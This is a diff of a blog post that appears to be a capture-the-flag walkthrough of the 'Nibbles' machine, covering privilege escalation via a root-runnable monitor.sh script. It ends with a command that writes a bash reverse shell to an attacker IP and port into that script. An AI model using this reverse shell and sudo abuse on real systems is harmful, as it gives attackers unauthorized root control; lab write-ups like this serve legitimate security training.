SaadAzil3/SaadAzil3.github.io/_posts/2025-08-14-my-local-post.md

 ![sudo](/assets/images/nibbles/sudo-l.png)

-It showed that we can run the `monitor.sh` script as root.
-After unzipping the `personal.zip` file, I got the script.
+The output shows that the `nibbler` user can run `/home/nibbler/personal/stuff/monitor.sh` as `root` without a password.

+I found a `personal.zip` file in the user's home directory, which I unzipped to find the `monitor.sh` script.

 ![Unzip The File](/assets/images/nibbles/'the zip fie.png')

-Checking the file, I noticed I had write permission.
-So I overwrote it with a reverse shell:
+Since I have write permissions on the script, I can overwrite it with a payload to get a root shell.
+I echoed a new reverse shell command into the script:

 ```bash
 echo "bash -c 'bash -i >& /dev/tcp/10.10.14.29/6666 0>&1'" > monitor.sh